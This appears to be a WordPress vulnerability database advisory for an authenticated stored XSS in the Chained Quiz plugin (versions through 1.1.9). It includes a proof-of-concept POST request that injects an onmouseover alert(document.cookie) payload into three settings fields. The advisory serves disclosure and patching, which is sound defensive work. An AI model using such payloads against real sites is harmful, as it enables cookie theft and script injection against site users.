Chained Quiz < 1.1.9.1 - Authenticated Stored XSS



Description
WordPress Plugin Plugin Chained Quiz latest (1.1.9) and before suffers from a Stored XSS vulnerability in the sender_name, admin_subject and user_subject POST parameter when an admin completes the setting for plugin (as a result, the severity is very low)
Proof of Concept
POST /wp-admin/admin.php?page=chainedquiz_options HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://example.com/wp-admin/admin.php?page=chainedquiz_options
Content-Type: application/x-www-form-urlencoded
Content-Length: 364
Connection: close
Cookie: [Admin cookies]
Upgrade-Insecure-Requests: 1

sender_name=a%22+onmouseover%3D%22alert%28document.cookie%29&sender_email=a&admin_subject=a%22+onmouseover%3D%22alert%28document.cookie%29&user_subject=a%22+onmouseover%3D%22alert%28document.cookie%29&go_ahead_value=WordPress%5C%5C&csv_delim=%2C&csv_quotes=1&ok=Save+Options&_wpnonce=9fb2fc749f&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_options

Affects Plugin

fixed in version 1.1.9.1

References

URL https://plugins.trac.wordpress.org/changeset/2248087

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher khoabda
Submitter khoabda
Submitter Website https://matuhn.github.io
Views 2435
Verified No
WPVDB ID 10082

Timeline

Publicly Published 2020-02-21 (4 months ago)
Added 2020-02-22 (4 months ago)
Last Updated 2020-02-22 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin